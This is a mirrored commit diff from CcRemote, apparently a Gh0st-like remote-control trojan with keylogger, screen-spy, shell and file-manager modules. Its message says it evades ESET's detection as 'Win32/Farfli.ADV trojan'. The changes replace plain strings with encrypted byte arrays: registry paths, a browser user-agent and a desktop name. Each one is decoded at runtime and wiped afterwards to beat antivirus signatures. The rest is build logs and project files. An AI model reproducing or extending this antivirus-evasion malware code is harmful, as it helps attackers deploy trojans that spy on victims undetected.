mirror of
https://github.com/Cc28256/CcRemote.git
synced 2025-07-31 06:26:48 +00:00
Anti Anti- Virus eset : a variant of Win32/Farfli.ADV trojan
This commit is contained in:
Cc28257
Binary file not shown.
@@ -181,6 +181,8 @@
|
||||
<ClInclude Include="common\install.h" />
|
||||
<ClInclude Include="common\KernelManager.h" />
|
||||
<ClInclude Include="common\KeyboardManager.h" />
|
||||
<ClInclude Include="common\login.h" />
|
||||
<ClInclude Include="common\loop.h" />
|
||||
<ClInclude Include="common\Manager.h" />
|
||||
<ClInclude Include="common\RegEditEx.h" />
|
||||
<ClInclude Include="common\ScreenManager.h" />
|
||||
|
||||
@@ -81,6 +81,12 @@
|
||||
<ClInclude Include="StrCry.h">
|
||||
<Filter>头文件</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="common\login.h">
|
||||
<Filter>头文件</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="common\loop.h">
|
||||
<Filter>头文件</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="dllmain.cpp">
|
||||
|
||||
@@ -1 +1,37 @@
|
||||
f:\myapp\ccremote\bin\server\ccmaindll.lib
|
||||
f:\myapp\ccremote\bin\server\ccmaindll.exp
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.pch
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\vc141.pdb
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\vc141.idb
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\pch.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\audio.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\until.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\buffer.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\clientsocket.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\videomanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\videocap.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\systemmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\shellmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\screenspy.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\screenmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\regeditex.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\manager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\keyboardmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\kernelmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\install.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\dialupass.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\audiomanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\filemanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\strcry.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\dllmain.obj
|
||||
f:\myapp\ccremote\bin\server\ccmaindll.ilk
|
||||
f:\myapp\ccremote\bin\server\ccmaindll.dll
|
||||
f:\myapp\ccremote\bin\server\ccmaindll.pdb
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\..\..\bin\server\ccmaindll.dll
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\ccmaindll.write.1u.tlog
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\cl.command.1.tlog
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\cl.read.1.tlog
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\cl.write.1.tlog
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\link.command.1.tlog
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\link.read.1.tlog
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\link.write.1.tlog
|
||||
|
||||
@@ -56,6 +56,20 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\common\install.cpp(214): warning C4996: 's
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\install.cpp(215): warning C4996: 'strcat': This function or variable may be unsafe. Consider using strcat_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(90): note: 参见“strcat”的声明
|
||||
KernelManager.cpp
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(192): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(192): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(218): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(218): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(256): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(256): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(275): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(275): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(276): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(276): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(277): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(277): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(310): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(310): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\kernelmanager.cpp(43): warning C4018: “<”: 有符号/无符号不匹配
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\kernelmanager.cpp(146): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\kernelmanager.cpp(146): warning C4309: “初始化”: 截断常量值
|
||||
@@ -101,20 +115,28 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\common\videocap.cpp(124): warning C4101:
|
||||
正在生成代码...
|
||||
cl : 命令行 warning D9002: 忽略未知选项“/Zc:stricStrings”
|
||||
FileManager.cpp
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(238): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(238): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(282): warning C4244: “=”: 从“unsigned __int64”转换到“unsigned long”,可能丢失数据
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(283): warning C4244: “=”: 从“unsigned __int64”转换到“unsigned long”,可能丢失数据
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(433): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(213): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(213): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(247): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(247): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(291): warning C4244: “=”: 从“unsigned __int64”转换到“unsigned long”,可能丢失数据
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(292): warning C4244: “=”: 从“unsigned __int64”转换到“unsigned long”,可能丢失数据
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(442): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(608): warning C4307: “+”: 整型常量溢出
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(605): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(617): warning C4307: “+”: 整型常量溢出
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(614): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(251): warning C4715: “CFileManager::OpenFile”: 不是所有的控件路径都返回值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(260): warning C4715: “CFileManager::OpenFile”: 不是所有的控件路径都返回值
|
||||
cl : 命令行 warning D9002: 忽略未知选项“/Zc:stricStrings”
|
||||
dllmain.cpp
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(38): warning C4101: “pEnd”: 未引用的局部变量
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(184): warning C4996: 'GetVersionExA': 被声明为已否决
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(103): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(103): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(159): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(159): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(197): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(197): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(224): warning C4996: 'GetVersionExA': 被声明为已否决
|
||||
d:\windows kits\10\include\10.0.17763.0\um\sysinfoapi.h(378): note: 参见“GetVersionExA”的声明
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(41): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(41): warning C4309: “初始化”: 截断常量值
|
||||
|
||||
@@ -58,6 +58,20 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\common\install.cpp(215): warning C4996: 's
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\install.cpp(214): warning C4996: 'strncpy': This function or variable may be unsafe. Consider using strncpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(338): note: 参见“strncpy”的声明
|
||||
KernelManager.cpp
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(192): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(192): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(218): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(218): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(256): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(256): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(275): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(275): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(276): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(276): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(277): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(277): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(310): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(310): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\kernelmanager.cpp(43): warning C4018: “<”: 有符号/无符号不匹配
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\kernelmanager.cpp(146): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\kernelmanager.cpp(146): warning C4309: “初始化”: 截断常量值
|
||||
@@ -99,19 +113,27 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\common\videocap.cpp(124): warning C4101:
|
||||
VideoManager.cpp
|
||||
cl : 命令行 warning D9002: 忽略未知选项“/Zc:stricStrings”
|
||||
FileManager.cpp
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(238): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(238): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(282): warning C4244: “=”: 从“unsigned __int64”转换到“unsigned long”,可能丢失数据
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(283): warning C4244: “=”: 从“unsigned __int64”转换到“unsigned long”,可能丢失数据
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(433): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(213): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(213): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(247): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(247): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(291): warning C4244: “=”: 从“unsigned __int64”转换到“unsigned long”,可能丢失数据
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(292): warning C4244: “=”: 从“unsigned __int64”转换到“unsigned long”,可能丢失数据
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(442): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(605): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(614): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(608): warning C4307: “+”: 整型常量溢出
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(617): warning C4307: “+”: 整型常量溢出
|
||||
cl : 命令行 warning D9002: 忽略未知选项“/Zc:stricStrings”
|
||||
dllmain.cpp
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(38): warning C4101: “pEnd”: 未引用的局部变量
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(184): warning C4996: 'GetVersionExA': 被声明为已否决
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(103): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(103): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(159): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(159): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(197): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(197): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(224): warning C4996: 'GetVersionExA': 被声明为已否决
|
||||
d:\windows kits\10\include\10.0.17763.0\um\sysinfoapi.h(378): note: 参见“GetVersionExA”的声明
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(41): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(41): warning C4309: “初始化”: 截断常量值
|
||||
@@ -123,7 +145,7 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\strcry.cpp(10): warning C4267: “=”:
|
||||
LINK : warning LNK4044: 无法识别的选项“/Zc:strictStrings”;已忽略
|
||||
正在创建库 ..\..\bin\server\CcMainDll.lib 和对象 ..\..\bin\server\CcMainDll.exp
|
||||
正在生成代码
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(251): warning C4715: “CFileManager::OpenFile”: 不是所有的控件路径都返回值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(260): warning C4715: “CFileManager::OpenFile”: 不是所有的控件路径都返回值
|
||||
All 352 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
|
||||
已完成代码的生成
|
||||
CcMainDll.vcxproj -> F:\myapp\CcRemote\CcMainDll\CcMainDll\..\..\bin\server\CcMainDll.dll
|
||||
|
||||
@@ -208,8 +208,17 @@ bool CFileManager::OpenFile(LPCTSTR lpFile, INT nShowCmd)
|
||||
RegQueryValue(hKey, NULL, strTemp, &nSize);
|
||||
RegCloseKey(hKey);
|
||||
memset(lpSubKey, 0, sizeof(lpSubKey));
|
||||
wsprintf(lpSubKey, "%s\\shell\\open\\command", strTemp);
|
||||
|
||||
//strcry
|
||||
char shell_open_command[] = {0x15,0xee,0xb9,0x95,0xbb,0xaf,0xa3,0xa9,0xa8,0x9f,0xad,0xb1,0xa5,0xd1,0xe2,0xde,0xd3,0xd6,0xd7,0xd8,0xd6,0xd3 }; //%s\\shell\\open\\command
|
||||
char* pShell_open_command = decodeStr(shell_open_command); //<2F><><EFBFBD>ܺ<EFBFBD><DCBA><EFBFBD>
|
||||
|
||||
wsprintf(lpSubKey, pShell_open_command, strTemp);
|
||||
|
||||
memset(pShell_open_command, 0, shell_open_command[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete pShell_open_command;
|
||||
|
||||
|
||||
if (RegOpenKeyEx(HKEY_CLASSES_ROOT, lpSubKey, 0L, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS)
|
||||
return false;
|
||||
memset(strTemp, 0, sizeof(strTemp));
|
||||
|
||||
@@ -98,7 +98,17 @@ bool getLoginInfo(char *lpURL, char **lppszHost, LPDWORD lppPort, char **lppszPr
|
||||
|
||||
HINTERNET hNet;
|
||||
HINTERNET hFile;
|
||||
hNet = InternetOpen("Mozilla/4.0 (compatible)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, INTERNET_INVALID_PORT_NUMBER, 0);
|
||||
|
||||
//strcry
|
||||
char Mozilla[] = { 0x18,0x86,0xa5,0xb3,0xa1,0xab,0xaa,0xa4,0xeb,0xf7,0xec,0xf1,0xe0,0x97,0xdd,0xd2,0xd1,0xcb,0xdb,0xcd,0xd1,0xd5,0xda,0xd0,0x9d }; //Mozilla/4.0 (compatible)
|
||||
char* pMozilla = decodeStr(Mozilla); //<2F><><EFBFBD>ܺ<EFBFBD><DCBA><EFBFBD>
|
||||
|
||||
hNet = InternetOpen(pMozilla, INTERNET_OPEN_TYPE_PRECONFIG, NULL, INTERNET_INVALID_PORT_NUMBER, 0);
|
||||
|
||||
memset(pMozilla, 0, pMozilla[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete pMozilla;
|
||||
|
||||
|
||||
if (hNet == NULL)
|
||||
return bRet;
|
||||
hFile = InternetOpenUrl(hNet, lpURL, NULL, 0, INTERNET_FLAG_PRAGMA_NOCACHE | INTERNET_FLAG_RELOAD, 0);
|
||||
@@ -139,9 +149,26 @@ DWORD CPUClockMhz()
|
||||
DWORD dwCPUMhz;
|
||||
DWORD dwBytes = sizeof(DWORD);
|
||||
DWORD dwType = REG_DWORD;
|
||||
RegOpenKey(HKEY_LOCAL_MACHINE, "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", &hKey);
|
||||
|
||||
//HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0
|
||||
//Anti Anti- Virus eset : a variant of Win32/Farfli.ADV trojan
|
||||
char HARDWARE[] = { 0x2e,0x83,0x8b,0x9b,0x8c,0x90,0x87,
|
||||
0x97,0x81,0x9f,0x86,0x84,0x93,0xfc,0xec,0xf4,0xec,
|
||||
0xef,0xf3,0xf6,0xf6,0xeb,0xe5,0xcc,0xc7,0xc7,0xd7,
|
||||
0xdc,0xec,0xec,0xcb,0xc3,0xd8,0xd9,0xcb,0xc5,0xf8,
|
||||
0xd5,0xc9,0xc6,0xc1,0xd0,0xd1,0xce,0xd2,0xc3,0xae
|
||||
}; //WinSta0\Default
|
||||
char* pHARDWARE = decodeStr(HARDWARE); //<2F><><EFBFBD>ܺ<EFBFBD><DCBA><EFBFBD>
|
||||
|
||||
RegOpenKey(HKEY_LOCAL_MACHINE, pHARDWARE, &hKey);
|
||||
RegQueryValueEx(hKey, "~MHz", NULL, &dwType, (PBYTE)&dwCPUMhz, &dwBytes);
|
||||
|
||||
RegCloseKey(hKey);
|
||||
|
||||
memset(pHARDWARE, 0, HARDWARE[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete pHARDWARE;
|
||||
|
||||
|
||||
return dwCPUMhz;
|
||||
}
|
||||
|
||||
@@ -163,12 +190,26 @@ UINT GetHostRemark(LPCTSTR lpServiceName, LPTSTR lpBuffer, UINT uSize)
|
||||
char strSubKey[1024];
|
||||
memset(lpBuffer, 0, uSize);
|
||||
memset(strSubKey, 0, sizeof(strSubKey));
|
||||
wsprintf(strSubKey, "SYSTEM\\CurrentControlSet\\Services\\%s", lpServiceName);
|
||||
|
||||
//strcry SYSTEM\CurrentControlSet\Services\%s
|
||||
char Services[] = { 0x24,0x98,0x93,0x9a,0x9c,0x82,0x8b,
|
||||
0x99,0x87,0xb6,0xb0,0xb3,0xa5,0xd1,0xca,0xfe,0xd3,
|
||||
0xd5,0xce,0xcb,0xd7,0xdb,0xe5,0xd0,0xc0,0xef,0xe1,
|
||||
0xd4,0xc2,0xd9,0xc7,0xce,0xc9,0xd8,0xf6,0x8c,0xdb }; //WinSta0\Default
|
||||
char* pServices = decodeStr(Services); //<2F><><EFBFBD>ܺ<EFBFBD><DCBA><EFBFBD>
|
||||
|
||||
//wsprintf(strSubKey, "SYSTEM\CurrentControlSet\Services\%s", lpServiceName);
|
||||
|
||||
wsprintf(strSubKey, pServices, lpServiceName);
|
||||
ReadRegEx(HKEY_LOCAL_MACHINE, strSubKey, "Host", REG_SZ, (char *)lpBuffer, NULL, uSize, 0);
|
||||
|
||||
if (lstrlen(lpBuffer) == 0)
|
||||
gethostname(lpBuffer, uSize);
|
||||
|
||||
memset(strSubKey, 0, sizeof(strSubKey));
|
||||
memset(pServices, 0, Services[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete pServices;
|
||||
|
||||
return lstrlen(lpBuffer);
|
||||
}
|
||||
|
||||
|
||||
@@ -8,6 +8,7 @@
|
||||
#include "AudioManager.h"
|
||||
#include "SystemManager.h"
|
||||
#include "KeyboardManager.h"
|
||||
#include "..\StrCry.h"
|
||||
#include "until.h"
|
||||
#include "install.h"
|
||||
#include <wininet.h>
|
||||
@@ -186,8 +187,19 @@ bool UpdateServer(LPCTSTR lpURL)
|
||||
STARTUPINFO si = {0};
|
||||
PROCESS_INFORMATION pi;
|
||||
si.cb = sizeof si;
|
||||
si.lpDesktop = "WinSta0\\Default";
|
||||
return CreateProcess(lpFileName, "CcRmt Update", NULL, NULL, false, 0, NULL, NULL, &si, &pi);
|
||||
|
||||
//strcry
|
||||
char WinSta0[] = { 0x0f,0x9c,0xa3,0xa7,0x9b,0xb3,0xa7,0xf5,0x98,0x87,0xa7,0xa7,0xa1,0xca,0xd2,0xc9 }; //WinSta0\Default
|
||||
char* pWinSta0 = decodeStr(WinSta0); //<2F><><EFBFBD>ܺ<EFBFBD><DCBA><EFBFBD>
|
||||
|
||||
//si.lpDesktop = "WinSta0\\Default";
|
||||
si.lpDesktop = pWinSta0;
|
||||
bool trueOrFales = CreateProcess(lpFileName, "CcRmt Update", NULL, NULL, false, 0, NULL, NULL, &si, &pi);
|
||||
|
||||
memset(pWinSta0, 0, WinSta0[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete pWinSta0;
|
||||
|
||||
return trueOrFales;
|
||||
}
|
||||
|
||||
|
||||
@@ -197,7 +209,17 @@ bool OpenURL(LPCTSTR lpszURL, INT nShowCmd)
|
||||
return false;
|
||||
|
||||
// System Ȩ<><C8A8><EFBFBD>²<EFBFBD><C2B2><EFBFBD>ֱ<EFBFBD><D6B1><EFBFBD><EFBFBD><EFBFBD><EFBFBD>shellexecute<74><65>ִ<EFBFBD><D6B4>
|
||||
char *lpSubKey = "Applications\\iexplore.exe\\shell\\open\\command";
|
||||
|
||||
//Applications\\iexplore.exe\\shell\\open\\command
|
||||
char Applications[] = { 0x2c,0x8a,0xba,0xb9,0xa4,0xae,
|
||||
0xa5,0xa4,0xb0,0xaa,0xad,0xaf,0xb3,0xe3,0xd7,0xd8,
|
||||
0xc4,0xcb,0xd6,0xd6,0xca,0xd2,0x98,0xd0,0xcc,0xd6,
|
||||
0xee,0xc2,0xd8,0xca,0xc2,0xc1,0xf0,0xc4,0xda,0xcc,
|
||||
0xc6,0xfb,0xc5,0xca,0xc9,0xce,0xc3,0xcf,0xc4 };
|
||||
char* pApplications = decodeStr(Applications); //<2F><><EFBFBD>ܺ<EFBFBD><DCBA><EFBFBD>
|
||||
|
||||
|
||||
char *lpSubKey = pApplications;
|
||||
HKEY hKey;
|
||||
char strIEPath[MAX_PATH];
|
||||
LONG nSize = sizeof(strIEPath);
|
||||
@@ -205,7 +227,15 @@ bool OpenURL(LPCTSTR lpszURL, INT nShowCmd)
|
||||
memset(strIEPath, 0, sizeof(strIEPath));
|
||||
|
||||
if (RegOpenKeyEx(HKEY_CLASSES_ROOT, lpSubKey, 0L, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS)
|
||||
{
|
||||
memset(pApplications, 0, Applications[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete pApplications;
|
||||
return false;
|
||||
}
|
||||
memset(pApplications, 0, Applications[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete pApplications;
|
||||
|
||||
|
||||
RegQueryValue(hKey, NULL, strIEPath, &nSize);
|
||||
